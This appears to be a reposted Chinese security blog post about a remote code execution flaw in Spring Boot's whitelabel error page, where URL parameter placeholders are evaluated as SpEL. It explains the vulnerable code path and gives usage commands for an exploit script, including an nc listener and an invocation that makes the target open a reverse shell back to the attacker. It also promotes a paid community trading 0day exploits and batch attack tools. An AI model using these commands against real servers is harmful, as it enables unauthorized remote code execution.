点击上方「蓝字」,关注我们
免责声明
文章正文
漏洞介绍
1、spring boot处理参数值出现错误,流程进入org.springframework.util.PropertyPlaceholderHelper
类
-
1. 此时会使用
parseStringValue
方法递归解析URL中的参数值。
3、“${}”包围的内容会被“org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration”类的“resolvePlaceholder”方法解析为SpEL表达式执行,导致RCE漏洞。
EXP介绍
通过这个EXP可以判断是否存在漏洞并反弹shell。
首先比如访问/article?id=xxx
时,页面会报错,状态码为500
:Whitelabel Error Page
,可以使用当前的POC & EXP
来尝试
使用方法
nc -lvvp 8088
python3 exp.py -lhost 127.0.0.1 -lport 8088 -t "http://127.0.0.1:9091/article?id="
-lhost:监听主机
-lport:监听端口
-t:目标URL(注意:需要包含主机、端口、路径、参数和"="。)
回复关键字【20240604】领取工具
知识星球
高质量漏洞利用工具、最新漏洞POC/EXP分享社区,日常更新一个0Day/Nday/1day及对应漏洞的批量利用工具,内部POC分享,星球不定时更新内外网攻防渗透技巧等。分享行业最新资讯,交流解答各类技术问题。
-
Fofa永久高级会员,助力挖洞 -
常态化更新最新的漏洞POC/EXP -
常态化更新未公开、半公开漏洞POC -
常态化更新优质外网打点、内网渗透工具 -
常态化更新安全资讯 -
开放交流环境,解决成员问题
点个「在看」,你最好看
原文始发于微信公众号(安全之眼SecEye):Spring Boot whitelabel error page远程命令执行漏洞 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论